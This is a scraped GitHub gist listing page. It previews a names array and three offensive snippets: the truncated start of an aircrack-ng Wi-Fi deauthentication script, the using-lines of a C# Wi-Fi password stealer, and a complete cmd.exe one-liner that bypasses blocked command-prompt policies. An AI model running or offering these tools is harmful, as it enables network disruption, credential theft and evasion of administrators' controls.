Skip to content

Instantly share code, notes, and snippets.

@BenjaminAdams
BenjaminAdams / FemaleNames.js
Created July 7, 2015 21:31
Male and female names in an array
var femaleNames = ["Emily","Hannah","Madison","Ashley","Sarah","Alexis","Samantha","Jessica","Elizabeth","Taylor","Lauren","Alyssa","Kayla","Abigail","Brianna","Olivia","Emma","Megan","Grace","Victoria","Rachel","Anna","Sydney","Destiny","Morgan","Jennifer","Jasmine","Haley","Julia","Kaitlyn","Nicole","Amanda","Katherine","Natalie","Hailey","Alexandra","Savannah","Chloe","Rebecca","Stephanie","Maria","Sophia","Mackenzie","Allison","Isabella","Amber","Mary","Danielle","Gabrielle","Jordan","Brooke","Michelle","Sierra","Katelyn","Andrea","Madeline","Sara","Kimberly","Courtney","Erin","Brittany","Vanessa","Jenna","Jacqueline","Caroline","Faith","Makayla","Bailey","Paige","Shelby","Melissa","Kaylee","Christina","Trinity","Mariah","Caitlin","Autumn","Marissa","Breanna","Angela","Catherine","Zoe","Briana","Jada","Laura","Claire","Alexa","Kelsey","Kathryn","Leslie","Alexandria","Sabrina","Mia","Isabel","Molly","Leah","Katie","Gabriella","Cheyenne","Cassandra","Tiffany","Erica","Lindsey","Kylie","Amy","Diana","Cassidy
@PintsizedSix40
PintsizedSix40 / deauth.sh
Created June 30, 2019 20:41
Script to deauth APs with aircrack-ng (SENDS TO AP, NOT CLIENT!)
function clean {
airmon-ng stop wlan0mon
ifconfig wlan0 down
ifconfig wlan0mon down
ifconfig wlan0 up
}
function getFromInput {
airodump-ng wlan0mon
echo Select the BSSID
@PintsizedSix40
PintsizedSix40 / WifiPassStealer.cs
Created October 11, 2019 19:09
A small C# program to grab wifi passwords (as well as the names) and output it to the console.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace WifiPassGrabber
{
class Program
{
@PintsizedSix40
PintsizedSix40 / cmd.bat
Last active October 31, 2019 06:55
A one-line command to give command-prompt that can be ran on computers with command-prompt blocked as long as "cmd /c" or "cmd /k" still functions. This command can be placed in shortcut files to be ran.
C:\Windows\System32\cmd.exe /v /k "@echo off&&FOR /L %N IN (1,0,10) DO ((FOR /F "tokens=* USEBACKQ" %F IN (`cd`) DO (set /p b=%F^>&&!b!)))"